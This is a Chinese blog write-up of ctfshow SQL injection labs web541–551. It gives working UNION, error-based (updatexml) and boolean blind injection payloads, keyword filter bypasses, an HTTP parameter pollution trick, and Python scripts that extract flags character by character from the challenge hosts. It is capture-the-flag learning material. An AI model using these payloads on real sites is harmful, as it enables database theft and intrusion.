ctfshow sqli-libs web541--web551

最新推荐文章于 2024-09-17 13:42:29 发布

baozongwi

最新推荐文章于 2024-09-17 13:42:29 发布

阅读量595

点赞数 22

分类专栏： ctfshow 文章标签：数据库 sql web安全 python

本文链接：https://blog.csdn.net/2301_81040377/article/details/140063797

版权

ctfshow 专栏收录该内容

49 篇文章 0 订阅

订阅专栏

web541

在这里插入图片描述

and和or 被替换为空格
# 还有   1'   也是不能生效的

?id=-1' union select 1,2,3--+
双写绕过
?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags

?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s

?id=-1' union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web542

?id=-1 union select 1,2,3--+
没见过这种不要闭合的

payload 由于库没变就把闭合换一下就行了
?id=-1 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags

?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s

?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web543

在这里插入图片描述

我就不绕（其实不会，试了很多都不行），你当我不会报错嘛

||代替or

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(schema_name))from(infoorrmation_schema.schemata))),3)||'1'='1

不知道大家还记得ctfshow的第一道sql题不
就类似于那个闭合原句应该是差不多

select * from id="'$_GET[id]'"

没写错的话应该就是这个样子

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow'))),3)||'1'='1
XPATH syntax error: '=flags'

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags'))),3)||'1'='1
XPATH syntax error: '=id,flag4s'

?id=-1'||updatexml(1,concat(0x3d,(select(flag4s)from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=ctfshow{2bcd1fdb-18f9-480c-a837'

?id=-1'||updatexml(1,concat(0x3d,(select(right(flag4s,14))from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=-3c13e46487d4}'

web544

在这里插入图片描述

布尔盲注
这里有个细节我们为了布尔盲注能够正确判断所以最后只能写0如果写1，就恒真，无法判断
在这里插入图片描述

?id=1'aandnd(if(ascii(substr(database(),1,1))=115,1,0))||'0

payload正常写脚本
写这个脚本我是写烦了，忘记加or双写，测试字符的时候括号老是对不上麻了麻了

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"
        url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=1'aandnd(if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"

        r = requests.get(url=url)
        if 'Dumb' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

web545

在这里插入图片描述

在这里插入图片描述
大小写双写都可以

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"
        url = f"https://cd991fbf-b4aa-4cda-b583-d8863dff54c7.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"

        r = requests.get(url=url)
        if 'Dumb' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

web546

用双引号

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((database()),{i},1))>{mid},1,0))||"0'
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||"0'
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||"0'
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||"0'
        url = f'https://2c00bae5-d8ec-40fb-9d48-97bd83f16e00.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||"0'

        r = requests.get(url=url)
        if 'Dumb' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

web547

在这里插入图片描述

看图?id=0'||(0)||'0"
上脚本

?id=0'||(1)||'0
也可以

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"
        #url = f"https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"
        url = f"https://5352a93c-678c-4cf0-b68e-4a3aaa9d5ca9.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"

        r = requests.get(url=url)
        if 'Dumb' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

我做完548倒过来一看不用or绕过了
所以用下题的脚本也是可以的

web548

上题同
nonono
他把or还回来了

?id=0'||(0)||'0
?id=0'||(1)||'0

在这里插入图片描述

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        # url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((database()),{i},1))>{mid},1,0))||'0"
        # url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},1,0))||'0"
        # url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||'0"
        # url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||'0"
        url = f"https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/?id=0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||'0"


        r = requests.get(url=url)
        if 'Dumb' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

web549

?id=1&id=-1'union select 1,2,3--+

?id=1&id=-1'union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

这里是一个知识点HPP，也就是HTTP Parameter Pollution，http 参数污染攻击的一个应用。
服务器端有两个部分：第一部分为 tomcat 为引擎的 jsp 型服务器，第二部分为 apache为引擎的 php 服务器，真正提供 web
服务的是 php 服务器。

工作流程为：client 访问服务器,能直接访问到 tomcat 服务器，然后 tomcat 服务器再向 apache
服务器请求数据。数据返回路径则相反。

看图就能正确的知道了
tomat jsp服务端接受第一个参数id,目前实验我所知道的仅为第一个
在这里插入图片描述

而apache php服务端应该是只处理最后一个参数id,所以我们就可以依靠这个来污染参数

web550

双引号闭合即可

?id=1&id=-1"union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web551

?id=1&id=-1") union select 1,(select group_concat(flag4s)from ctfshow.flags),3--+

baozongwi

关注

22
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录